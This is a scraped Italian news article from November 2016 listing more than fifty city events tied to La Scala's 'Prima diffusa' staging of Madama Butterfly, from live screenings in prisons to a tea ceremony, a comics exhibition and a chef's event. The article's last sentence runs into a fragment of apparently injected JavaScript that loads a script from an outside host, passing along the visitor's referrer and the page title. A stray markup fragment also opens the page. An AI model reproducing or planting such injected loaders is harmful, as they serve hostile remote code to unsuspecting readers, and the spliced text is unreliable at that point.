"/>
giovedì 17 agosto 2017 01:52:50
omnimilano

Scala, 50 eventi in città per la ‘Prima diffusa’: da proiezioni e musica a cucina e fumetto

28 novembre 2016 Cultura

Una prima della Scala diffusa, tra musica, proiezioni, laboratori, incontri, ma anche cucina e fumetto. Sono oltre cinquanta gli eventi in cartellone dal 28 novembre al 14 dicembre legati alla promozione della prima del Teatro alla Scala di quest’anno, che nella serata del 7 dicembre vedrà in scena la Madama Butterfly del maestro Giacomo Puccini. Aumentano in questa sesta edizione le sedi delle proiezioni in diretta dello spettacolo, che passano da 21 a 27, con l’inserimento di nuovi spazi in meno centrali, come il Teatro Martinitt, il mare culturale urbano, l’Auditorium Enzo Balboni, il Chiosco del Parco Trapezio a Santa Giulia, oltre ai classici musei e spazi pubblici e privati in tutti i Municipi della città. Restano in programma anche le proiezioni nelle carceri: oltre al carcere di Opera e Bollate, quest’anno la prima sarà trasmessa in diretta anche nel carcere minorile Beccaria. Oltre alle dirette, nella settimana che precede la Prima saranno trasmessi in filodiffusione i brani dell’opera pucciniana in galleria Vittorio Emanuele II, nel mezzanino Atm della stazione di Duomo, nella stazione ferroviaria del passante di Porta Vittoria e nei mercati coperti di Santa Maria del Suffragio e di Lorenteggio. Oltre a queste idee, è prevista anche una serie di iniziative dedicate a storia e tradizioni dell’antico Giappone, come la cerimonia del tè, che si terrà secondo il rito tradizionale alle 16 e alle 18 di domenica 4 dicembre presso la palazzina Liberty in largo Marinai d’Italia, e il racconto dei miti del Giappone visti attraverso i linguaggi del cinema e del teatro, che si terrà martedì 6 dicembre al museo interattivo del cinema in viale Fulvio Testi. Al Teatro dell’Arte alle ore 20.45 andrà in scena “Butterfly Blues”, produzione ad hoc realizzata per la Prima Diffusa dal Teatro delle Ombre, centrata sulla figura e i temi di Giacomo Puccini. Due ambiti nuovi per la prima diffusa che saranno esplorati durante questa edizione sono invece il fumetto e la cucina, con la mostra “Un fil di fumetto”, che aprirà il 3 dicembre nelle sale di WOW Spazio Fumetto, in viale Campania, e l’evento speciale di chiusura della manifestazione ‘Incontro in cucina fra Occidente e Oriente’ con lo chef Roberto Okabe, che si terrà mercoledì 14 dicembre alle 18.30 a palazzo Edison in foro Buonaparte.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo